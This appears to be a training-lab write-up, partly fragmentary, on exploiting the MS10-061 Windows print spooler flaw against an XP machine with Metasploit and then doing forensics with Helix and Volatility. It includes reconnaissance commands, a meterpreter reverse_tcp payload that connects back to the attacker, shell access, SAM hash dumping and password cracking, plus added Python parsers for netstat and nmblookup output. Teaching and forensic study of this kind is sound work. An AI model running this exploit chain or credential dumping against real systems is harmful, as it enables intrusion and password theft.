1. What is Metasploit

Metasploit Framework is an open-source penetration testing framework, and it maintains the largest public exploit database in the world. In short, Metasploit can be used to detect and verify security vulnerabilities, but it can equally be used for intrusions.

2. What is Helix

Helix is a bootable live CD that bundles security incident response and forensics tools.

3. What is the Print Spooler Service Impersonation vulnerability (CVE-2010-2729)

MSF exploit module used: MS10_061_spoolss

The Windows print spooler does not adequately restrict user access to the service, so an attacker can create a file in the Windows system directory (%SystemRoot%\system32) by submitting a specially crafted print request.

The attacker can specify any file name, including one containing directory traversal, and by sending WritePrinter requests has complete control over the contents of the file that is created.

Once the file has been written into the Windows system directory (%SystemRoot%\system32), WMI is used to launch the malicious program: the system automatically compiles and runs any MOF file placed in the %SystemRoot%\System32\Wbem\MOF folder, so the commands the MOF file contains are executed.

This vulnerability was first discovered in use by the well-known Stuxnet worm.

4. Experimental environment

Attack machine: Kali Linux
Target machine: Windows XP SP2

5. Experimental steps
5.1 Using Nmap to check whether the NetBIOS and RPC services exist on the target machine
5.2 NetBIOS share detection
5.3 Attack the target computer with MSF module MS10_061_spoolss
5.4 Collecting Basic Evidence Files
5.5 Using Helix Remote Memory Forensics
5.6 Downloading Basic Forensic Files
6. Download Helix
7. Set the target environment
1. Obtain the IP address of the target computer

2. Create a shared printer (by default no printer is shared)

1) Open the Control Panel and double-click "Printers and Faxes"

8. Check print sharing on Kali

1) Nmap scan

nmap -sS -sU -O -p 137-139,445 192.168.1.149

2) Find the NetBIOS name

nmblookup -A 192.168.1.149

NetBIOS group (workgroup) name: MSHOME

Master Browser: __MSBROWSE__

The second column is the NetBIOS suffix:

00: Workstation Service (the workstation name; when the type is Group, the workgroup name)

03: Windows Messenger Service

06: Remote Access Server

20: File Service (also called the Host Record)

21: Remote Access Service client

1B: Domain Master Browser (the Primary Domain Controller of a domain)

1D: Master Browser

The fourth column is the node type:

B-node: 0x01 Broadcast

P-node: 0x02 Peer (WINS only)

M-node: 0x04 Mixed (Broadcast, then WINS)

H-node: 0x08 Hybrid (WINS, then Broadcast)
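As an added example (not part of the original lab write-up), the following Python script parses the status rows of `nmblookup -A` using the suffix table above and summarises what the host advertises to the network: its name, workgroup, whether it offers file sharing (<20>) and whether it is the workgroup's master browser (<1D>). This is useful for asset inventory and for checking that a host is not exposing services it should not. The sample output is constructed to resemble the lab target; it is not a real capture.

```python
import re

# NetBIOS suffix meanings as listed on this page; any other suffix is reported as "unknown".
NETBIOS_SUFFIXES = {
    "00": "Workstation Service", "03": "Messenger Service", "06": "Remote Access Server",
    "1B": "Domain Master Browser (PDC)", "1D": "Master Browser",
    "20": "File Service (Host Record)", "21": "Remote Access Service client",
}
NODE_TYPES = {"B": "Broadcast", "P": "Peer (WINS only)",
              "M": "Mixed (Broadcast, then WINS)", "H": "Hybrid (WINS, then Broadcast)"}
# One status row looks like "\tMSHOME  <00> - <GROUP> B <ACTIVE>"; <GROUP> is absent for unique names.
ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9a-fA-F]{2})>\s+-\s+(<GROUP>)?\s*([BPMH])\s+<(\w+)>")

def parse_nmblookup(output):
    """Parse the status rows of nmblookup -A into dicts (name, suffix, role, type, node_type, status)."""
    rows = []
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        name, suffix, group, node, status = m.groups()
        suffix = suffix.upper()
        rows.append({"name": name, "suffix": suffix,
                     "role": NETBIOS_SUFFIXES.get(suffix, "unknown"),
                     "type": "Group" if group else "Unique",
                     "node_type": NODE_TYPES.get(node, node), "status": status})
    return rows

def host_summary(rows):
    """What the host advertises: name, workgroup, file sharing (<20>) and master browser role (<1D>)."""
    s = {"hostname": None, "workgroup": None, "file_sharing": False, "master_browser": False}
    for r in rows:
        if r["suffix"] == "00":
            s["workgroup" if r["type"] == "Group" else "hostname"] = r["name"]
        elif r["suffix"] == "20":
            s["file_sharing"] = True
        elif r["suffix"] == "1D":
            s["master_browser"] = True
    return s

# Constructed sample, modelled on the lab target's nmblookup output; not a real capture.
SAMPLE = """Looking up status of 192.168.1.149
\tWXPSP2          <00> -         B <ACTIVE>
\tMSHOME          <00> - <GROUP> B <ACTIVE>
\tWXPSP2          <20> -         B <ACTIVE>
\tMSHOME          <1e> - <GROUP> B <ACTIVE>
\tMSHOME          <1d> -         B <ACTIVE>
\t..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
"""
```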

9. Access SMB resources

smbclient -L \\\\WXPSP2 -I 192.168.1.149 -N

10. Use MSF to attack

1) Load the module and view the parameters to be configured

set PAYLOAD windows/meterpreter/reverse_tcp

4) Set the payload parameters

The malicious program is written to the target machine as %SystemRoot%\System32\g9bmJiyNobtyos.exe; it connects back to Kali, which establishes a Meterpreter session. Record the name of this program for later use.

The malicious program is launched by the MOF file %SystemRoot%\System32\wbem\mof\kt044wVLbyxwgk.mof.

6) Next, a series of operations can be performed from the session

6.1) getuid and getpid

getuid
getpid

6.2) Running shell drops directly into the command-line interface of the target computer

6.4) Find the network connection associated with PID 392

11. Conduct basic information collection and forensics

11.1) Process, network and directory information collection

tasklist > forensics_tasklist.txt

netstat -ano > forensics_netstat.txt

dir > dir_forensics.txt
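As an added example (not from the original lab), the following Python script does offline what steps 6.4 and 11.1 do by hand: it parses the collected tasklist and netstat -ano output, maps every socket to its owning image name, and flags processes holding an ESTABLISHED TCP session to another host, which is the footprint a reverse_tcp payload leaves on the victim. The sample output is constructed: PID 392 and the dropped file name come from this page, while the remote address and port are placeholders.

```python
import re

# Constructed sample output (not a real capture) modelled on "tasklist" and "netstat -ano" from
# the XP target; PID 392 and the image name come from the page, the remote address is a placeholder.
TASKLIST = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process              0 Console                 0         28 K
spoolsv.exe                   1500 Console                 0      4,512 K
g9bMJIYNoBtyOS.exe             392 Console                 0      3,980 K
svchost.exe                   1064 Console                 0      4,228 K
"""
NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.149:1040     192.168.1.100:4444     ESTABLISHED     392
  UDP    0.0.0.0:445            *:*                                    4
"""
TASK_RE = re.compile(r"^(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")
NET_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")

def parse_tasklist(text):
    """Map PID -> image name from tasklist output (header and separator lines are skipped)."""
    procs = {}
    for line in text.splitlines():
        m = TASK_RE.match(line)
        if m:
            procs[int(m.group(2))] = m.group(1).strip()
    return procs

def parse_netstat(text):
    """List of (proto, local, remote, state, pid) from netstat -ano; UDP rows carry no state."""
    conns = []
    for line in text.splitlines():
        m = NET_RE.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            conns.append((proto, local, remote, state or "", int(pid)))
    return conns

def connections_for_pid(pid, procs, conns):
    """Sockets owned by one PID, each prefixed with the owning image name (step 6.4)."""
    return [(procs.get(c[4]),) + c for c in conns if c[4] == pid]

def reverse_connections(procs, conns):
    """Processes with an ESTABLISHED TCP session to another host: the mark a reverse_tcp payload leaves."""
    return [(pid, procs.get(pid), local, remote) for proto, local, remote, state, pid in conns
            if proto == "TCP" and state == "ESTABLISHED" and not remote.startswith("127.")]
```

The same functions run unchanged over the real forensics_tasklist.txt and forensics_netstat.txt files downloaded in step 15.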

12. Obtain SAM database information

Dump the SAM database with hashdump

The SAM is the database file in which Windows XP, Windows Vista and Windows 7 store local account password hashes.

13. Establish a remote forensics collection environment

14. Collect the memory information of the victim

1) Load the Helix 2008R1 CD

3) View the collected files

15. Download other forensic files

Download the process information, network information and malware sample collected earlier

download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\dir_forensics.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\g9bMJIYNoBtyOS.exe /forensics/ms10_061/

16. Use John to crack the password

After information collection is complete, Volatility is used to analyse the captured memory image.

Volatility: analysing the MS10-061 attack

17. Description

This article was originally published by Hetian Net Safety Laboratory.

About Hetian Net Safety Laboratory

Hetian Network Security Laboratory (www.hetianlab.com) is a leading domestic online education platform for hands-on network security, offering practical training in real environments. The experimental content covers system security, software security, network security, web security, mobile security, CTF, forensic analysis, penetration testing, network security awareness education and more.